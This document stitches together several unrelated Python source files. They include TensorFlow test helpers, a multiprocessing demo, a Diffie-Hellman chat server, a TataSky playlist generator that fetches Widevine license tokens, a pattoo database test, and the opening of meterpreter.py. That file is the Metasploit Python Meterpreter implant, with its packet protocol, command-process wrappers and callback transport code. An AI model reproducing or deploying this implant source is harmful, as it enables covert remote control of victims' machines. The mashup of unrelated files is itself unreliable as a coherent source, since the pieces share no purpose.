if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
  This is useful to test tf.gradients() in tests that use tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
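# A minimal usage sketch (the parameterized `use_tape` flag, `f` and `x` are
# illustrative assumptions): the same test body can exercise both
# tf.GradientTape and tf.gradients.
#
#   with AbstractGradientTape(use_tape=use_tape) as tape:
#     tape.watch(x)
#     y = f(x)
#   dy_dx = tape.gradient(y, x)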
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
  WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
  *WILL NOT* make the tf.function run eagerly because eager is disabled by
  default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
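# Usage sketch (illustrative, not part of the original module):
#   with run_functions_eagerly(True):
#     my_tf_function(x)  # in V2 the Python body runs eagerly; in V1 it still runs as a traced graph
# The previous def_function.RUN_FUNCTIONS_EAGERLY setting is restored when the context exits.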
|
process_communication_with_queue.py
|
import multiprocessing
# SENTINEL = object()  # don't do this: each process receives its own unpickled copy
SENTINEL = 'STOP'  # use a plain picklable value, because object identities get messed up across processes
def producer(q, n):
a, b = 0, 1
while a <= n:
q.put(a)
a, b = b, a + b
q.put(SENTINEL)
def consumer(q):
while True:
num = q.get()
if num == SENTINEL:
break
print(f'Got numba {num}')
if __name__ == '__main__':
    # the guard is required for the 'spawn' start method (Windows/macOS)
    q = multiprocessing.Queue()  # the multiprocessing queue, not the threading one
    cns = multiprocessing.Process(target=consumer, args=(q,))
    prd = multiprocessing.Process(target=producer, args=(q, 35))
    prd.start()
    cns.start()
    prd.join()
    cns.join()
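# Why a string sentinel instead of `object()` (illustration, not part of the original script):
# the queue pickles whatever is put on it and unpickles a new object on get(), so an identity
# check against a module-level object() always fails, while a simple value like 'STOP'
# compares equal on both sides:
#     marker = object()
#     q.put(marker)
#     q.get() is marker   # False: unpickling produces a different object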
|
server.py
|
#!/usr/bin/env python
"""
SecureChat server: starts a server that routes chat messages.
"""
import socket
import threading
import sys
import binascii
import argparse
from M2Crypto import DH as M2DH
from dhke import DH, DH_SIZE, LEN_PK
from cipher import Message
__author__ = "spec"
__license__ = "MIT"
__version__ = "0.1"
__status__ = "Development"
# The number of unaccepted connections that the system will allow
# before refusing new connections.
BACKLOG = 5
# The default port the server should use.
DEFAULT_PORT = 39482
class Server:
def __init__(self, host='127.0.0.1', port=DEFAULT_PORT):
"""
Initialize a new server object.
:param host: IP address of the server
:param port: Port to use for the server
"""
print("SecureChat Sever v{}".format(__version__))
self.host = host
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Generate Diffie-Hellman Key Exchange Parameters
print("Generating a {}-bit prime...".format(DH_SIZE))
self.dh_params = M2DH.gen_params(DH_SIZE, 2)
print("Done!")
self.clients = []
# Start the server, break on ^C
try:
self.start()
except KeyboardInterrupt:
print("\rExiting...")
            # iterate over a copy: disconnect() removes clients from self.clients
            for client in list(self.clients):
                self.disconnect(client)
self.socket.close()
sys.exit()
def start(self):
"""
Wait for clients to connect, perform DHKE with each new
connection, then listen for incoming messages.
"""
# Bind server socket
self.socket.bind((self.host, self.port))
print("Socket bound to {} on port {}".format(self.host, self.port))
# Start listening on the socket
self.socket.listen(BACKLOG)
print("Waiting for Clients...")
while True:
# Create a new socket for an incoming client
connection, address = self.socket.accept()
print("{} has connected".format(address[0]))
# Create new client object for this connection
client = Client(self, connection, address)
# Wait for next client if key exchange failed
if not client.key:
client.connection.close()
print("{} has disconnected".format(client.address[0]))
continue
print("Client Key: {}".format(binascii.hexlify(client.key).decode("utf-8")))
# Add client to list of clients on server
self.clients.append(client)
self.broadcast("{} has joined".format(client.address[0]), client, show_address=False)
# Listen for incoming messages from client
threading.Thread(target=self.listen, args=(client, )).start()
def listen(self, client):
"""
Receive and handle data from a client.
:param client: client to receive data from
"""
while True:
try:
# Wait for data from client
data = client.connection.recv(1024)
# Disconnect client if no data received
if not data:
self.disconnect(client)
break
print("{} [Raw]: {}".format(client.address[0], data))
# Parse data as cipher-text message
msg = Message(key=client.key, ciphertext=data)
print("{} [Decrypted]: {}".format(client.address[0], msg.plaintext))
if msg.plaintext == "!exit":
client.send("Acknowledged")
self.disconnect(client)
continue
self.broadcast(msg.plaintext, client)
# Disconnect client if unable to read from connection
except OSError:
self.disconnect(client)
break
def broadcast(self, content, from_client, show_address=True):
if show_address:
msg = from_client.address[0] + ": " + content
else:
msg = content
        for client in self.clients:
            if client is not from_client:
                client.send(msg)
def disconnect(self, client):
"""
Disconnect a client from the server.
:param client: client to be disconnected
"""
client.connection.close()
if client in self.clients:
disconnect_msg = "{} has disconnected".format(client.address[0])
self.broadcast(disconnect_msg, client, show_address=False)
try:
self.clients.remove(client)
except ValueError:
pass
print(disconnect_msg)
class Client:
def __init__(self, server, connection, address, user=None):
"""
Initialize a new client on a server.
:param server: the server to which the client belongs
:param connection: the socket on which the server communicates with the client
:param address: the IP address and port of the client
:param user: the User object the client is logged in as (not yet implemented)
"""
self.connection = connection
self.address = address
self.user = user
self.key = self.dh(server.dh_params)
def dh(self, dh_params):
"""
Perform Diffie-Hellman Key Exchange with a client.
:param dh_params: p and g generated by DH
:return shared_key: shared encryption key for AES
"""
# p: shared prime
p = DH.b2i(dh_params.p)
        # g: primitive root modulo p
g = DH.b2i(dh_params.g)
# a: randomized private key
a = DH.gen_private_key()
# Generate public key from p, g, and a
public_key = DH.gen_public_key(g, a, p)
# Create a DH message to send to client as bytes
dh_message = bytes(DH(p, g, public_key))
self.connection.sendall(dh_message)
# Receive public key from client as bytes
try:
response = self.connection.recv(LEN_PK)
except ConnectionError:
print("Key Exchange with {} failed".format(self.address[0]))
return None
client_key = DH.b2i(response)
# Calculate shared key with newly received client key
shared_key = DH.get_shared_key(client_key, a, p)
return shared_key
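    # Worked sketch of the exchange above with toy numbers (illustration only, not the
    # parameters this server actually uses):
    #     p, g = 23, 5                    # shared prime and generator
    #     a, b = 6, 15                    # server and client private keys
    #     A = pow(g, a, p)                # 8  -> sent to the client
    #     B = pow(g, b, p)                # 19 -> received from the client
    #     pow(B, a, p) == pow(A, b, p)    # True; both sides derive the shared key 2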
def send(self, content):
"""
Encrypt and send a message to the client
:param content: plaintext content to be encrypted
"""
msg = Message(key=self.key, plaintext=content)
self.connection.sendall(msg.pack())
def decrypt(self, content):
"""
Decrypt an encrypted message.
:param content: encrypted message content to be decrypted
:return: decrypted message
"""
return Message(key=self.key, ciphertext=content).plaintext
if __name__ == '__main__':
# Get host and port arguments from the command-line
aparser = argparse.ArgumentParser()
aparser.add_argument("--host", default='127.0.0.1', help="IP address of the chat server")
aparser.add_argument("--port", default=DEFAULT_PORT, type=int, help="Port number the chat server is running on")
args = aparser.parse_args()
s = Server(host=args.host, port=args.port)
|
utils.py
|
import jwtoken as jwt
import threading
m3ustr = '#EXTM3U x-tvg-url="https://github.com/Shra1V32/epg/raw/master/epg.xml.gz" \n\n'
kodiPropLicenseType = "#KODIPROP:inputstream.adaptive.license_type=com.widevine.alpha"
def processTokenChunks(channelList):
global m3ustr
kodiPropLicenseUrl = ""
if not channelList:
print("Channel List is empty ..Exiting")
exit(1)
for channel in channelList:
ls_session_key = jwt.generateJWT(channel['channel_id'], iterative=False)
if ls_session_key != "":
licenseUrl = channel['channel_license_url'] + "&ls_session=" + ls_session_key
kodiPropLicenseUrl = "#KODIPROP:inputstream.adaptive.license_key=" + licenseUrl + "|Content-Type=application/octet-stream|R{SSM}|"
else:
print("Didn't get license for channel: Id: {0} Name:{1}".format(channel['channel_id'],
channel['channel_name']))
print('Continuing...Please get license manually for channel :', channel['channel_name'])
m3ustr += kodiPropLicenseType + "\n" + kodiPropLicenseUrl + "\n" + "#EXTINF:-1 "
m3ustr += "tvg-id=" + "\"" + "ts" + channel['channel_id'] + "\" " + "group-title=" + "\"" + channel['channel_genre'] + "\" " + "tvg-logo=\"" + channel[
'channel_logo'] + "\" ," + channel['channel_name'] + "\n" + channel['channel_url'] + "\n\n"
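# Caveat (assumption, not in the original script): the worker threads spawned by m3ugen()
# all append to the shared global m3ustr. Because `m3ustr += ...` is a read-modify-write,
# concurrent chunks can interleave and lose entries; a threading.Lock around the append
# (or having each worker return its own string to be joined afterwards) would make the
# accumulated playlist deterministic.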
def m3ugen():
ts = []
global m3ustr
channelList = jwt.getUserChannelSubscribedList()
for i in range(0, len(channelList), 5):
        t = threading.Thread(target=processTokenChunks, args=(channelList[i:i + 5],))
ts.append(t)
t.start()
for t in ts:
t.join()
print("================================================================")
print("Found total {0} channels subscribed by user \nSaving them to m3u file".format(len(channelList)))
print("================================================================")
saveM3ustringtofile(m3ustr)
def saveM3ustringtofile(m3ustr):
with open("allChannelPlaylist.m3u", "w") as allChannelPlaylistFile:
allChannelPlaylistFile.write(m3ustr)
def getPrintNote():
s = " *****************************************************\n" + "Welcome To TataSky Channel Generation Script\n" + \
"**********************************************************\n" + \
"- Using this script you can generate playable links based on the channels you have subscribed to \n" + \
"- You can always read the README.md file if you don't know how to use the generated file \n" + \
"- You can login using your password or generate an OTP. You need to enter both the Registered Mobile Number \n" + \
"\n Caution: This doesn't promote any kind of hacking or compromising anyone's details"
return s
if __name__ == '__main__':
m3ugen()
|
test___init__.py
|
#!/usr/bin/env python3
"""Testing pattoo/db/db.py."""
import os
import unittest
import sys
from random import random, randint
import multiprocessing
from collections import namedtuple
# Try to create a working PYTHONPATH
EXEC_DIR = os.path.dirname(os.path.realpath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(
os.path.abspath(os.path.join(
os.path.abspath(os.path.join(
EXEC_DIR, os.pardir)), os.pardir)), os.pardir))
_EXPECTED = '{0}pattoo{0}tests{0}pattoo_{0}db'.format(os.sep)
if EXEC_DIR.endswith(_EXPECTED) is True:
# We need to prepend the path in case the repo has been installed
# elsewhere on the system using PIP. This could corrupt expected results
sys.path.insert(0, ROOT_DIR)
else:
print('''This script is not installed in the "{0}" directory. Please fix.\
'''.format(_EXPECTED))
sys.exit(2)
from tests.libraries.configuration import UnittestConfig
from pattoo_shared import data
from pattoo.db.table import language
class TestBasicFunctions(unittest.TestCase):
"""Checks all functions and methods."""
def test_main(self):
"""Testing method / function main."""
#
# NOTE!
#
# This test is to verify that multiprocessing is supported without
        # hanging. We don't want the database to hang when there is a large
        # load of connections to it. This is a very important test. It MUST
# pass for pattoo to be reliable.
# Initialize key variables
loops = 10
process_count = 100
timeout = 600
code = data.hashstring(str(random()))
names = [
data.hashstring(str(random())) for _ in range(loops)
]
Arguments = namedtuple('Arguments', 'loops process_count code names')
# Add an entry to the database
language.insert_row(code, names[0])
# Make sure it exists
idx_language = language.exists(code)
# Verify the index exists
result = language.idx_exists(idx_language)
self.assertTrue(result)
# Create arguments
arguments = Arguments(
code=code,
loops=loops,
names=names,
process_count=process_count
)
# Spawn a single process with a timeout
process = multiprocessing.Process(target=run_, args=(arguments,))
process.start()
process.join(timeout)
# Test if timing out
if process.is_alive():
            # Multiprocessing is failing if this times out. It could be due to
# the loops taking too long (unlikely, but should be checked), or
# it could be a general failure in the database engine code in
# pattoo.db.__init__.py.
print('''\
Test for multiprocessing database update is hanging. Please check possible \
causes.''')
sys.exit(2)
def run_(arguments):
"""Run multiprocessing database updates.
    Args:
        arguments: Arguments namedtuple of (loops, process_count, code, names)
Returns:
None
"""
# Create a list of arguments from a random list of names
args = [
(arguments.code, arguments.names[
randint(0, len(arguments.names) - 1)]) for _ in range(
arguments.process_count)
]
# Now spawn processes and update the table
for loop in range(arguments.loops):
print('Processing loop {}'.format(loop))
with multiprocessing.get_context(
'spawn').Pool(processes=arguments.process_count) as pool:
pool.starmap(language.update_name, args)
# Wait for all the processes to end and get results
pool.join()
if __name__ == '__main__':
# Make sure the environment is OK to run unittests
UnittestConfig().create()
# Do the unit test
unittest.main()
|
meterpreter.py
|
#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
# this MUST be imported for urllib to work on OSX
try:
import SystemConfiguration as osxsc
osxsc.SCNetworkInterfaceCopyAll()
has_osxsc = True
except ImportError:
has_osxsc = False
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
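# Illustrative example (not in the original source): an uncaught ValueError becomes
#   (crc16('ValueError') << 16) | ERROR_FAILURE_PYTHON
# so the high 16 bits identify the exception class and the low 16 bits the failure domain.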
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
	return  # PEP 479: raising StopIteration inside a generator raises RuntimeError on Python 3.7+
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
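# Example (illustrative, not in the original source):
#   packet_get_tlv(request, TLV_TYPE_METHOD) -> {'type': TLV_TYPE_METHOD, 'length': 18, 'value': 'core_uuid'}
# or an empty dict when no TLV of the requested type is present in the packet.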
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
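# Illustrative example (not in the original source): packing a string TLV produces a
# 4-byte big-endian total length (value + 8-byte header + trailing NUL), a 4-byte type, then the value:
#   tlv_pack(TLV_TYPE_METHOD, 'core_uuid')
#   == struct.pack('>II', 18, TLV_TYPE_METHOD) + bytes('core_uuid', 'UTF-8') + NULL_BYTE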
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
#@export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
#@export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
#@export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
#@export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
self._send_packet(pkt)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
